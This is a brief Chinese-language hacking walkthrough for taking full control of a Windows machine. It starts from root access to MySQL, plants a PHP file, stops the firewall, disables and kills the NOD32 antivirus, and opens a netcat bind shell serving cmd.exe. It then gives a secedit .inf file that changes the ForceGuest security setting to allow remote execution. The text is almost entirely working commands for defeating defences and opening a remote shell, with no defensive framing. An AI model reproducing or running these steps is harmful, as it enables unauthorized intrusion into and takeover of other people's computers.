1.用root连上mysql,射入php文件。
2.进一步的控制,先消灭防毒软件+防火墙,再用scedit关闭简单文件共享,用RemoteExecute射入。
3.恭喜你。这台机子全部归你了。
一定要先关掉防火墙,否则,万事介休。
net stop SharedAccess
1.终结NOD32的进程
sc config NOD32krn start= disabled
tasklist 找出nod32krn的PID为678
taskkill /IM 678
2.运行NC后台监听
d:/rcon/nc -l -p 16657 -t -e cmd.exe
用nc连上去
nc 192.168.0.56 16657
3.用RemoteExecute连上控制
将如下内容存为d:\forceguest.inf传上去
[version]
signature="$CHICAGO$"
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0
在受控机上执行
secedit /configure /db 1.sdb /cfg d:\forceguest.inf /log 1.log